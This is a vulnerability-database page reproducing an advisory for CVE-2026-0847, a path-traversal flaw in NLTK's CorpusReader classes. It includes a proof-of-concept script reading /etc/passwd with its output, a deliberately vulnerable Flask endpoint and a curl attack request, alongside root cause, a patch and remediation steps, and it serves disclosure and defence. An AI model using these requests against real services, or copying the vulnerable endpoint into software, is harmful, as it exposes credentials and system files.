Lucene search
K

📄 NLTK 3.9.2 Arbitrary File Read / Path Traversal

🗓️ 31 Mar 2026 00:00:00Reported by Sarvesh PatilType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 121 Views

CVE-2026-0847 in Natural Language Toolkit <=3.9.2 enables arbitrary file read via path traversal in corpus readers.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-0847
4 Mar 202618:25
attackerkb
Circl
CVE-2026-0847
4 Mar 202619:31
circl
CNNVD
NLTK 路径遍历漏洞
4 Mar 202600:00
cnnvd
CVE
CVE-2026-0847
4 Mar 202618:25
cve
Cvelist
CVE-2026-0847 Path Traversal in nltk/nltk
4 Mar 202618:25
cvelist
Debian CVE
CVE-2026-0847
4 Mar 202618:25
debiancve
IBM Security Bulletins
Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to a Path Traversal in NLTK [CVE-2026-0847]
14 Apr 202615:13
ibm
EUVD
EUVD-2026-9475
4 Mar 202621:32
euvd
Huntr
NLTK – Multiple CorpusReader classes allow Arbitrary File Read via Path Traversal
4 Dec 202518:25
huntr
Github Security Blog
NLTK has a Path Traversal issue
4 Mar 202621:32
github
Rows per page
# CVE-2026-0847 — NLTK Multiple CorpusReader Classes: Arbitrary File Read via Path Traversal
    
    <p align="center">
      <img src="https://img.shields.io/badge/CVE-2026--0847-red?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Severity-High%20(CVSS%208.6)-orange?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Affected-NLTK%20%3C%3D%203.9.2-yellow?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Type-CWE--22%20Path%20Traversal-blue?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Status-%20Fixed-lightgrey?style=for-the-badge" />
    </p>
    
    ---
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | CVE-2026-0847 |
    | **Package** | `nltk` (Natural Language Toolkit) |
    | **Registry** | PyPI |
    | **Affected Versions** | `<= 3.9.2` |
    | **Vulnerability Type** | CWE-22: Path Traversal |
    | **CVSS Score** | 8.6 (High) |
    | **Attack Vector** | Network |
    | **Attack Complexity** | Low |
    | **Privileges Required** | None |
    | **User Interaction** | None |
    | **Confidentiality Impact** | High |
    | **Integrity Impact** | Low |
    | **Availability Impact** | Low |
    | **Reported On** | December 4, 2025 |
    | **CVE Published** | March 4, 2026 |
    | **Supported By** | Palo Alto Networks / Prisma AIRS |
    | **Status** |  Fixed |
    
    ---
    
    ## Description
    
    Multiple `CorpusReader` classes in the NLTK library accept file path arguments without applying any path canonicalization, allowlist validation, or sandbox restrictions. When an attacker controls the corpus filename or file input — a common scenario in machine learning APIs, upload-based NLP pipelines, and chatbot services — they can supply a crafted path to traverse the directory hierarchy and read arbitrary files on the server.
    
    This vulnerability is particularly critical in networked deployments where NLTK processes user-controlled file paths, as no authentication or privilege is required to exploit it.
    
    ---
    
    ## Affected Components
    
    | Class | File | Status |
    |---|---|---|
    | `WordListCorpusReader` | `wordlist.py` L1–L120 | Vulnerable |
    | `TaggedCorpusReader` | `tagged.py` L1–L140 | Vulnerable |
    | `BracketParseCorpusReader` | `bracket_parse.py` L1–L150 | Vulnerable |
    | Other classes using the same base pattern | — | Pending wider audit |
    
    All three classes inherit the same unsafe `CorpusReader.open()` method, which performs no path restriction before resolving and reading the supplied file identifier.
    
    ---
    
    ## Impact
    
    Successful exploitation of this vulnerability can result in:
    
    - **Arbitrary file read** — An attacker can read any file accessible to the process running NLTK, including `/etc/passwd`, `/etc/shadow`, and `/var/log/auth.log`
    - **Credential and secret exposure** — SSH private keys (`~/.ssh/id_rsa`), `.env` files, API tokens, and cloud credential files can be extracted
    - **Source code and training data disclosure** — Other users' training data or proprietary application source code may be read
    - **Remote Code Execution (chained)** — When combined with pickle-deserialization vulnerabilities, path traversal can be used to load malicious model files and escalate to full RCE
    - **Lateral movement** — In microservice environments, extracted secrets have been observed enabling lateral movement and full server compromise
    
    ---
    
    ## Proof of Concept
    
    > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**
    
    ### Local File Read via Direct API
    
    ```python
    # PoC.py — demonstrates arbitrary file read using three vulnerable CorpusReader classes
    
    from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader
    from nltk.corpus.reader.util import FileSystemPathPointer
    
    root = FileSystemPathPointer("/")   # unrestricted filesystem root
    target = "etc/passwd"               # any sensitive file path
    
    print("--- WordListCorpusReader ---")
    reader1 = WordListCorpusReader(root, [target])
    print(reader1.raw(target)[:200])
    
    print("--- TaggedCorpusReader ---")
    reader2 = TaggedCorpusReader(root, [target])
    print(reader2.raw(target)[:200])
    
    print("--- BracketParseCorpusReader ---")
    reader3 = BracketParseCorpusReader(root, [target])
    print(reader3.raw(target)[:200])
    ```
    
    **Output (abbreviated):**
    
    ```
    --- WordListCorpusReader ---
    root:x:0:0:root:/root:/usr/bin/zsh
    
    --- TaggedCorpusReader ---
    root:x:0:0:root:/root:/usr/bin/zsh
    
    --- BracketParseCorpusReader ---
    root:x:0:0:root:/root:/usr/bin/zsh
    ```
    
    ### Remote Exploit Scenario — Vulnerable Flask API
    
    A realistic scenario where NLTK is exposed via an HTTP API:
    
    ```python
    # Vulnerable API server
    from flask import Flask, request
    from nltk.corpus.reader import WordListCorpusReader
    from nltk.corpus.reader.util import FileSystemPathPointer
    
    app = Flask(__name__)
    root = FileSystemPathPointer("/")
    
    @app.post("/read")
    def read_file():
        filename = request.json.get("file")
        reader = WordListCorpusReader(root, [filename])
        return reader.raw(filename)
    
    app.run("0.0.0.0", 8000)
    ```
    
    **Attacker request:**
    
    ```bash
    curl -X POST http://TARGET:8000/read \
         -H "Content-Type: application/json" \
         -d '{"file": "etc/passwd"}'
    ```
    
    **Result:** Full contents of `/etc/passwd` returned to the attacker with no authentication required.
    
    ---
    
    ## Root Cause
    
    The vulnerability originates in `CorpusReader.open()`. The method resolves the supplied `fileid` directly against the configured root path using `FileSystemPathPointer.join()` without performing any of the following checks:
    
    - Absolute path rejection
    - Parent directory traversal (`..`) detection
    - Path normalization and comparison to enforce confinement within the corpus root
    
    Because `FileSystemPathPointer` can be initialized with `/`, an attacker who controls the filename argument has unrestricted read access to the entire filesystem.
    
    ---
    
    ## Suggested Patch
    
    Minimal fix proposed by the researcher, to be applied inside `CorpusReader.open()`:
    
    ```python
    import os
    
    normalized = fileid.replace("\\", "/")
    
    # Block absolute paths
    if os.path.isabs(normalized):
        raise ValueError("Absolute paths are not permitted.")
    
    # Block directory traversal sequences
    if ".." in normalized.split("/"):
        raise ValueError("Path traversal sequences are not permitted.")
    
    # Enforce confinement within corpus root
    joined = self._root.join(normalized)
    if not os.path.normpath(joined._path).startswith(
        os.path.normpath(self._root._path)
    ):
        raise ValueError("Path escapes the corpus root directory.")
    ```
    
    The upstream fix PR is available at:
    [https://github.com/nltk/nltk/pull/3479](https://github.com/nltk/nltk/pull/3479)
    
    ---
    
    ## Remediation
    
    | Action | Details |
    |---|---|
    | **Upgrade NLTK** | Update to a version greater than 3.9.2 once an official patch is released |
    | **Input Validation** | Sanitize and validate all user-supplied file path values before passing them to any NLTK `CorpusReader` class |
    | **Avoid User-Controlled Paths** | Do not allow user input to directly or indirectly control the `fileids` argument of any `CorpusReader` |
    | **Least Privilege** | Run NLTK-based services under a restricted OS user account with read access limited to the corpus directory only |
    | **Containerization** | Isolate the service in a Docker container or chroot jail to limit the blast radius of a successful traversal |
    | **Ubuntu Patch** | Monitor the [Ubuntu Security Advisory](https://ubuntu.com/security/CVE-2026-0847) for distribution-level package updates |
    
    **Upgrade via pip:**
    
    ```bash
    pip install --upgrade nltk
    ```
    
    **Verify installed version:**
    
    ```bash
    python -c "import nltk; print(nltk.__version__)"
    ```
    
    ---
    
    ## Timeline
    
    | Date | Event |
    |---|---|
    | December 4, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 |
    | December 2025 | NLTK maintainer team notified via huntr.dev |
    | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded to researcher |
    | January 2026 | CVE-2026-0847 assigned |
    | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
    | March 4, 2026 | CVE published on NVD and huntr.dev |
    | March 5, 2026 | NVD record last modified |
    
    ---
    
    ## References
    
    | Resource | Link |
    |---|---|
    | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0847 |
    | Ubuntu Security Advisory | https://ubuntu.com/security/CVE-2026-0847 |
    | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0847 |
    | huntr.dev Report | https://huntr.dev |
    | Fix Pull Request | https://github.com/nltk/nltk/pull/3479 |
    | NLTK on PyPI | https://pypi.org/project/nltk/ |
    | OWASP Path Traversal | https://owasp.org/www-community/attacks/Path_Traversal |
    | CWE-22 | https://cwe.mitre.org/data/definitions/22.html |
    
    ---
    
    ## Disclaimer
    
    This repository documents CVE-2026-0847 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.
    
    Any use of this information to access systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.
    
    
    Contributors [@mohitf070304](https://github.com/mohitf070304)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 38.6
EPSS0.0008
SSVC
121